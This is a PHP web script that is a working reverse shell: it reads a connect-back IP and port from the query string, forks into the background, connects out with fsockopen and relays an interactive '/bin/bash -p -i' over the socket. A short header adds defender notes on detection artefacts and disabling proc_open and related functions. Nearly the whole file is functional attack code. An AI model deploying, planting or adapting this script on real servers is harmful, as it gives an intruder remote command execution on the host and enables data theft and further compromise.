<?php
// Reverse-shell web script. The remote host and port are taken straight from
// the HTTP query string ($_GET["ip"], $_GET["port"]) with no validation, so any
// client that can reach this file can make the web server open an outbound
// connection. Flow: optionally daemonise (pcntl_fork + posix_setsid), fsockopen()
// to ip:port, proc_open() "/bin/bash -p -i", then relay bytes between the socket
// and the shell's stdin/stdout/stderr until either side closes.
//
// Defender notes: this file sitting in a web root is itself an incident. The
// observable artefacts are an outbound TCP connection from the PHP/web worker,
// a bash child of that worker, and a PHP worker calling pcntl_fork/posix_setsid.
// Listing proc_open, pcntl_fork and posix_setsid in php.ini disable_functions
// removes the capabilities this script depends on.
set_time_limit (0);          // never let the script time out; the relay loop below runs until a stream closes
$VERSION = "1.0";
$ip = $_GET["ip"];           // untrusted: connect-back address from the request
$port = $_GET["port"];       // untrusted: connect-back port from the request
$chunk_size = 1400;          // bytes moved per fread()/fwrite() relay step
$write_a = null;             // no write/except sets are watched by stream_select()
$error_a = null;
$shell = '/bin/bash -p -i';  // interactive bash, started via proc_open() below
$daemon = 0;                 // set to 1 once fork + setsid succeed
$debug = 0;                  // when truthy, printit() reports every relayed chunk

if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

// Outbound TCP connection to the caller-supplied address; 30-second connect timeout
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

// Relay loop: socket -> shell stdin, shell stdout/stderr -> socket.
// Exits only when the TCP peer or the shell's stdout reaches EOF.
while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    // (timeout null: block indefinitely until one of the three streams is readable)
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

// Tear down: close the socket and all three shell pipes, then reap the child
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
// @param string $string  message to emit; a newline is appended
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>